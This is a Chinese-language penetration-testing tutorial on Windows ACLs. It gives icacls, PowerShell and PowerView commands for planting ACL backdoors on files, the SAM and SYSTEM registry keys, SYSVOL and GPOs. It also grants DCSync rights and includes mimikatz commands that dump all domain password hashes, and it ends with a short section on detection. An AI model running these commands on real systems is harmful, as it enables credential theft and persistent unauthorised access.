0x00 前言
Windows系统中的ACL(Access Control List),用来表示用户(组)权限的列表。
在渗透测试中,理解并运用ACL,尤其在后门利用(提权)方面,可供发挥的空间很大。
而站在防御的角度,如果系统被攻破,找到并清除攻击者留下的ACL后门,同样需要对ACL有一定的了解。
0x01 简介
本文将要介绍以下内容:
· ACL相关概念
· 查看ACL
· ACL利用(文件、注册表和域环境)
· ACL检测
0x02 ACL相关概念
官方文档:
https://docs.microsoft.com/en-us/windows/desktop/SecAuthZ/access-control-lists
ACL:
Access Control List,用来表示用户(组)权限的列表,包括DACL和SACL。
ACE:
Access Control Entry,ACL中的元素。
DACL:
Discretionary Access Control List,用来表示安全对象权限的列表。
SACL:
System Access Control List,用来记录对安全对象访问的日志。
直观理解:
Windows访问控制模型中会用到ACL,比如文件、注册表的权限都包括ACL,用来表示哪些用户(组)具有操作权限。
例如对某个文件进行访问,系统将做以下判断:
· 如果没有DACL,系统将允许访问
· 如果存在DACL,但没有ACE,系统将拒绝所有访问
· 如果存在DACL,也存在ACE,那么会按照每个ACE指定允许或拒绝
实例演示
对于文件夹C:\Windows\SYSVOL\sysvol\test.com,查看文件夹属性。
默认共有五条DACL,如下图:
选中一条DACL,其中包含多个ACE,表示具有的权限,如下图:
0x03 文件中的ACL
常用命令(icacls):
1、查看指定文件的ACL
icacls C:\Windows\SYSVOL\sysvol\test.com
如下图:
2、备份指定文件(包括当前目录及其子目录中的文件)的ACL
icacls C:\Windows\SYSVOL\sysvol\test.com /save AclFile /t
3、还原指定文件(包括当前目录及其子目录中的文件)的ACL
icacls C:\Windows\SYSVOL\sysvol\ /restore AclFile /t
注:还原时,路径需要设置为上级目录。
4、添加用户test1对指定文件(包括当前目录及其子目录中的文件)的完全访问权限
icacls C:\Windows\SYSVOL\sysvol\test.com /grant test1:(OI)(CI)(F) /t
注:(OI)代表对象继承 (CI)代表容器继承 (F)代表完全访问。
5、移除用户test1对指定文件(包括当前目录及其子目录中的文件)的完全访问权限
icacls C:\Windows\SYSVOL\sysvol\test.com /remove test1 /t
常用命令(powershell):
1、查看指定路径的ACL
例如C:\Windows\SYSVOL\sysvol\test.com
Get-Acl -Path 'C:\Windows\SYSVOL\sysvol\test.com'| Format-Table -wrap
2、添加用户test1对指定文件的完全访问权限
function Add-ACL{ [CmdletBinding()] Param ( [Parameter(Mandatory = $True)] [String] [ValidateNotNullOrEmpty()] $Path ) $acl = Get-Acl -Path $Path $person = [System.Security.Principal.NTAccount]"test1" $access = [System.Security.AccessControl.FileSystemRights]"FullControl" $inheritance = [System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit" $propagation = [System.Security.AccessControl.PropagationFlags]"None" $type = [System.Security.AccessControl.AccessControlType]"Allow" $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( ` $person,$access,$inheritance,$propagation,$type) $acl.AddAccessRule($rule) Set-Acl $Path $acl } Add-ACL -Path 'C:\Windows\SYSVOL\sysvol\test.com'
3、移除用户test1对指定文件的完全访问权限
function Remove-ACL{ [CmdletBinding()] Param ( [Parameter(Mandatory = $True)] [String] [ValidateNotNullOrEmpty()] $Path ) $acl = Get-Acl -Path $Path $person = [System.Security.Principal.NTAccount]"test1" $access = [System.Security.AccessControl.FileSystemRights]"FullControl" $inheritance = [System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit" $propagation = [System.Security.AccessControl.PropagationFlags]"None" $type = [System.Security.AccessControl.AccessControlType]"Allow" $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( ` $person,$access,$inheritance,$propagation,$type) $acl.RemoveAccessRule($rule) Set-Acl $Path $acl } Remove-ACL -Path 'C:\Windows\SYSVOL\sysvol\test.com'
4、添加用户test1对指定文件(包括当前目录及其子目录中的文件)的完全访问权限
function Add-ACL{ [CmdletBinding()] Param ( [Parameter(Mandatory = $True)] [String] [ValidateNotNullOrEmpty()] $Path ) $acl = Get-Acl -Path $Path $person = [System.Security.Principal.NTAccount]"test1" $access = [System.Security.AccessControl.FileSystemRights]"FullControl" $inheritance = [System.Security.AccessControl.InheritanceFlags]"None" $propagation = [System.Security.AccessControl.PropagationFlags]"None" $type = [System.Security.AccessControl.AccessControlType]"Allow" $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( ` $person,$access,$inheritance,$propagation,$type) $acl.AddAccessRule($rule) Set-Acl $Path $acl } Add-ACL -Path 'C:\Windows\SYSVOL\sysvol\test.com' $fileList = Get-ChildItem 'C:\Windows\SYSVOL\sysvol\test.com' -recurse Foreach($file in $fileList) { $file.fullname Add-ACL -Path $file.fullname }
5、移除用户test1对指定文件(包括当前目录及其子目录中的文件)的完全访问权限
function Remove-ACL{ [CmdletBinding()] Param ( [Parameter(Mandatory = $True)] [String] [ValidateNotNullOrEmpty()] $Path ) $acl = Get-Acl -Path $Path $person = [System.Security.Principal.NTAccount]"test1" $access = [System.Security.AccessControl.FileSystemRights]"FullControl" $inheritance = [System.Security.AccessControl.InheritanceFlags]"None" $propagation = [System.Security.AccessControl.PropagationFlags]"None" $type = [System.Security.AccessControl.AccessControlType]"Allow" $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( ` $person,$access,$inheritance,$propagation,$type) $acl.RemoveAccessRule($rule) Set-Acl $Path $acl } Remove-ACL -Path 'C:\Windows\SYSVOL\sysvol\test.com' $fileList = Get-ChildItem 'C:\Windows\SYSVOL\sysvol\test.com' -recurse Foreach($file in $fileList) { Remove-ACL -Path $file.fullname }
利用思路:
1、本地提权后门
在取得Windows系统的管理员权限后,可以修改系统目录的ACL,添加普通用户的完全访问权限,作为提权后门。
后续可以通过dll劫持、文件替换等多种方法从普通用户提升至管理员权限。
2、域环境GPO的修改
修改域内共享文件夹\\<DOMAIN>\SYSVOL\<DOMAIN>\的ACL,添加普通用户的完全访问权限。
后续可以使用域内普通用户的权限修改域环境的GPO,修改GPO的计划任务,实现计划任务的远程执行。
相关方法可参考之前的文章《域渗透——利用GPO中的计划任务实现远程执行》。
3、域内普通用户读取域内所有用户hash
创建ntds.dit的文件共享,添加ACL。
后续可以使用域内普通用户访问域控制器的ntds.dit文件,读取域内所有用户的hash。
0x04 注册表中的ACL
常用命令(powershell):
1、查看指定路径的ACL
例如HKEY_LOCAL_MACHINE\SAM
Get-Acl -Path 'HKLM:\SAM'| Format-Table -wrap
如下图:
获得Access项的具体内容:
$acl = Get-Acl -Path 'HKLM:\SAM' $acl.Access
如下图:
2、添加用户test1对指定路径(包括当前注册表项及其子健)的完全访问权限
$acl = Get-Acl HKLM:\SAM $person = [System.Security.Principal.NTAccount]"test1" $access = [System.Security.AccessControl.RegistryRights]"FullControl" $inheritance = [System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit" $propagation = [System.Security.AccessControl.PropagationFlags]"None" $type = [System.Security.AccessControl.AccessControlType]"Allow" $rule = New-Object System.Security.AccessControl.RegistryAccessRule( ` $person,$access,$inheritance,$propagation,$type) $acl.AddAccessRule($rule) Set-Acl HKLM:\SAM $acl
注:
· $inheritance = [System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit"表示其子健继承当前注册表项的权限。
· 修改注册表项HKLM:\SAM的ACL需要Administrator权限。
· 修改注册表项HKLM:\SAM\SAM的ACL需要System权限。
3、移除用户test1对指定路径(包括当前注册表项及其子健)的完全访问权限
$acl = Get-Acl HKLM:\SAM $person = [System.Security.Principal.NTAccount]"test1" $access = [System.Security.AccessControl.RegistryRights]"FullControl" $inheritance = [System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit" $propagation = [System.Security.AccessControl.PropagationFlags]"None" $type = [System.Security.AccessControl.AccessControlType]"Allow" $rule = New-Object System.Security.AccessControl.RegistryAccessRule( ` $person,$access,$inheritance,$propagation,$type) $acl.RemoveAccessRule($rule) Set-Acl HKLM:\SAM $acl
利用思路:
1、本地提权后门
修改注册表项HKLM:\SAM和HKLM:\SYSTEM,添加普通用户的完全访问权限。
普通用户能够通过注册表项获得本地所有用户的hash,进而获得管理员权限。
3、本地自启动后门
修改注册表位置,添加启动项或者劫持项。
0x05 域环境中的ACL
通过Active Directory Service Interfaces (ADSI)实现。
官方文档:
Powershell调用ADSI的参考资料:
常用命令(powershell):
注:PowerView已经实现了这部分内容,所以本节直接引用PowerView中的功能。
代码地址:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
1、获得当前域内所有对象
Get-DomainObject -Domain test.com
2、获得当前域内所有对象的ACL
Get-DomainObjectAcl -Domain test.com
3、获得指定用户的ACL
Get-DomainUser test1
4、添加用户test1对指定对象(guid)的完全访问权限
Add-DomainObjectAcl -TargetIdentity '483e9973-2d45-4e2f-b034-f272a26950e0' -PrincipalIdentity test1 -Rights All
5、移除用户test1对指定对象(guid)的完全访问权限
Remove-DomainObjectAcl -TargetIdentity '483e9973-2d45-4e2f-b034-f272a26950e0' -PrincipalIdentity test1 -Rights All
利用思路:
1、DCSync后门
注:
该方法学习自:https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf
DCSync是mimikatz的一个功能,能够模拟域控制器并从域控制器导出帐户密码hash。
如果我们在域内一台主机上获得了域管理员权限,可以使用如下命令直接导出域内所有用户的hash:
mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /all /csv exit"
导出域内administrator帐户的hash:
mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /user:administrator exit"
默认情况下,只有Domain Controllers和Enterprise Domain Admins权限能够使用DCSync
但我们可以对DS-Replication-GetChanges(GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)和DS-Replication-Get-Changes-All(1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)添加ACL,这样就能实现普通用户调用DCSync导出域内所有用户的hash
实现代码:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1#L8270
添加ACL的命令如下:
Add-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test1 -Rights DCSync
接下来,在域内一台登录了test1用户的主机上面,就能使用mimikatz的DCSync功能。
删除ACL的命令如下:
Remove-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test1 -Rights DCSync
2、GPO后门
(1)查看当前域内的GPO
Import-Module GroupPolicy Get-GPO -All
如下图,TestGPO是我在测试环境自己添加的,Default Domain Policy和Default Domain Controllers Policy是域环境默认存在的GPO。
(2)添加用户test1对TestGPO的完全访问权限
$RawObject = Get-DomainGPO -Raw -Identity 'TestGPO' $TargetObject = $RawObject.GetDirectoryEntry() $ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Allow -PrincipalIdentity test1 -Right AccessSystemSecurity,CreateChild,Delete,DeleteChild,DeleteTree,ExtendedRight,GenericAll,GenericExecute,GenericRead,GenericWrite,ListChildren,ListObject,ReadControl,ReadProperty,Self,Synchronize,WriteDacl,WriteOwner,WriteProperty $TargetObject.PsBase.ObjectSecurity.AddAccessRule($ACE) $TargetObject.PsBase.CommitChanges()
(3)移除用户test1对TestGPO的完全访问权限
$RawObject = Get-DomainGPO -Raw -Identity 'TestGPO' $TargetObject = $RawObject.GetDirectoryEntry() $ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Allow -PrincipalIdentity test1 -Right AccessSystemSecurity,CreateChild,Delete,DeleteChild,DeleteTree,ExtendedRight,GenericAll,GenericExecute,GenericRead,GenericWrite,ListChildren,ListObject,ReadControl,ReadProperty,Self,Synchronize,WriteDacl,WriteOwner,WriteProperty $TargetObject.PsBase.ObjectSecurity.RemoveAccessRule($ACE) $TargetObject.PsBase.CommitChanges()
后续可以对GPO进行操作,添加计划任务,实现计划任务的远程执行,具体方法可参考之前的文章《域渗透——利用GPO中的计划任务实现远程执行》。
0x06 ACL检测
1、文件和注册表
可借助开源工具WindowsDACLEnumProject:
https://github.com/nccgroup/WindowsDACLEnumProject
能够列出存在风险的ACL。
2、域环境
需要开启高级安全审核策略,参考资料:
开启策略后,Event ID 5136会记录域环境中ACL的修改,参考资料:
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=5136
0x07 小结
本文介绍了Windows系统中的ACL在文件、注册表和域环境下后门利用方面的技巧,并给出检测后门的建议。
我从PowerView中学到了很多域环境下ACL的知识,在此感谢作者的开源。